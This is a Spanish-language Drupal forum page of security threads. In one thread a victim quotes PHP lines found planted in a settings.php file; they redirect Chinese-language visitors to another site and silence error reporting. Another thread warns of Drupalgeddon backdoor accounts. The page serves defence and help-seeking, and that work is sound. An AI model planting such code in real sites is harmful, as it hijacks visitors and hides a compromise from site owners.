seguridad

Events happening in the community are now at Drupal community events on www.drupal.org.
jonn59's picture

vulnerada mi instalaciòn de drupal 7

Posted by jonn59 on October 10, 2017 at 1:51am

Hola a todos, recurro a ustedes por una situacion de seguridad que se me presento en mi plataforma Drupal 7,

Recientemente habilite un certificado para tener conexiones seguras(Https) pero al ingresar a mi archivo settings.php a realizar unos cambios me lleve la sorpresa de que habia una serie de lineas no propias de la instalación de Drupal, las lineas extrañsa son las siguientes:


<?php
$lan = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
if (preg_match ( '/zh-cn/i', $lan)){
$url = 'http://www.baidu.com/';
header("location: " . $url);
exit();
}
error_reporting(0);

Read more
4 comments Categories: , ,
koffer's picture

Cuando el ‎drupalgeddon‬ nos alcance

Posted by koffer on October 24, 2014 at 7:56pm

el drupalgeddon

Generalmente cuando sale una actualización de drupal muchos nos tomamos algo de tiempo para cambiar de versión. Da la sensación que no pasa nada, pero con la ultima vulnerabilidad están pasando cosas y malas.

Si no has actualizado tu sitio a la versión 7.32 y entras a la administración y vez un nuevo usuario que se llama drupaldev y un nuevo rol que se llama megauser. ya estas en el club de miles de sitios web hackeados.

Read more
13 comments1 attachment Categories: ,
leandro713's picture

Vulnerabilidades drupal

Posted by leandro713 on September 29, 2012 at 7:01pm

Hola!
en un rato tonto estoy haciendo un escáner en ruby que me indique la versión y vulnerabilidades de un sitio Drupal dado.
me dirijo a vosotros para ver si podemos hacer en común una lista de inseguridades o prácticas no recomendables para chequearlas con mi script y advertir de ellas con él.
No se, así de primeras, creo que los ficheros
CHANGELOG.txt, COPYRIGHT.txt, INSTALL.mysql.txt, etc ...
deberían borrarse (opinión discutible, lo se) ¿se os ocurre alguna idea mas?

Read more
5 comments1 attachment Categories: , , ,
hemofilia's picture

Duda sobre autenticacion - uso secure-site

Posted by hemofilia on August 14, 2012 at 1:21pm

Hola a todos, estoy dando mis primeros pasos en Drupal y me encuentro con este problema por decirlo asi. Tengo un sitio que estoy desarrollando y uso secure-site para autentificar los usuarios que entraran al sistema. Para acceder al sistema siempre hay que autentificarse, o sea, no podran acceder al mismo usuarios anonimos.

Read more
5 comments Categories: , ,
dmouse's picture

Tips de seguridad en Drupal

Posted by dmouse on April 18, 2012 at 10:47pm

Algunos tips de seguridad en Drupal, que opinan algún otro?
http://dmouse.net/blog/5-tips-de-seguridad-en-drupal

Read more
7 comments Categories: , ,
vempar's picture

Comparativa seguridad

Posted by vempar on November 24, 2011 at 6:35am

Aquí os dejo un enlace con una comparativa de la cantidad de vulnerabilidades Drupal, wordpres y joomla.

http://www.securitybydefault.com/2011/11/joomla-wordpress-o-drupal-cual-...

Read more
2 comments Categories: ,
enyelber's picture

Seguridad en Drupal

Posted by enyelber on November 8, 2010 at 2:40pm

Seguridad en drupal, ¿Como hacer nuestro Drupal mas seguro y evitar que los panas hacker te dañen tu día?
Cuales son los primeros pasos para tener una buena seguridad?

Read more
Categories: , , ,
dariogcode's picture

http://www.itaipu.gov.br - Baches de seguridad

Posted by dariogcode on November 26, 2007 at 4:54pm

Recientemente he visto que se publican los mejores sitios echos en drupal LINK, he observado algunos y me detuve en este que me gustó: http://www.itaipu.gov.br

No estoy criticando, pero si destacando algunas errores, que si yo los cometiera, me gustarìa que me lo hagan saber:

1). En el menu de navegación izquierdo cada link pasa como parametros un nombre de archivo correspondiente a una foto, ¡si!, ni siquiera un id o un hash, un nombre... y que resulta de esto?, una posible inyección de codigo no deseado, ejemplos:
(copiar y pegar)

Read more
Categories: ,
Subscribe with RSS Syndicate content